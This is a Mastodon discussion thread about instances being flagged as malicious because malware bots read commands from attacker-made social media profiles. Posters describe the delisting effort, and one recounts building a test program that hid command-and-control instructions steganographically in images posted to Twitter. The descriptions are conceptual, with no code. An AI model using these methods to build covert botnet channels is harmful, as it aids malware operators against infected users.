I have made a post about some Mastodon instances being associated with malware and explaining what I found: https://github.com/mastodon/mastodon/discussions/18688
@hugo here is key bit from the above: “… an attacker creates a profile on a social media site like anyone else. Then adds the URL of their profile (or RSS feed) to the malware bot. Once the bot infects a third-party computer, it fetches the social media profile of the attacker and looks for instructions. The attacker can then issue instructions/commands using standard social media tools, and the bot follows those instructions . “ cc: @mastohost
@hugo Thank you for this! We had the same issue with mstdn.social on the exact same day as mastodon.social but fort i my response was in time to not get 'banned'.
I have done many scans since this issue but never found anything else than the one account with a "ping IP" in the bio! I've spend a load of time getting us from all VirusTotal related sites since many just copy paste the result
@stux Thank you so much for sharing.
How did you mstdn.social out of VirusTotal? I could do it on CRDF Threat Center but don't know how I can do it on VirusTotal.
@hugo Get in touch with all vendors that list you as malicious 😮
There was one or two that i couln't find anywhere so I bet we're still flagged
Most have forums or removal req forms
@tchambers @hugo Aiii.. I see indeed! https://www.virustotal.com/gui/domain/indieweb.social
Just give you a +1 at least ❤️
Another theme that keeps popping up is ppl on Fedi using (#)GriftHub.
Also as s part of a holistic movement towards #censorshipResistance, all instances should strive to federate over Tor or I2P.
We posit that federation over #I2P should be default because Tor don't like lots of traffic (eg. they don't recommend torrenting over Tor etc).
@hugo around 20 years ago various large IRC channels were shut down because they were being used for C&C. I then wrote a test program that made Twitter usable as a C&C frontend. At that time there was still an RSS feed and you could easily search it for commands. I then steganographically hid the commands in cat images that were delivered as PNG.
Since I got the hang of it with my little knowledge and in a few days, I'm sure that such or similar methods are probably widespread.
@hugo wait so mastodon safe to use? Also one of my old friends is a cyber security expert that researchers these sort of thing an also crazy about crypto security.
Masto.pt é uma instância de Mastodon para pessoas que falam Português.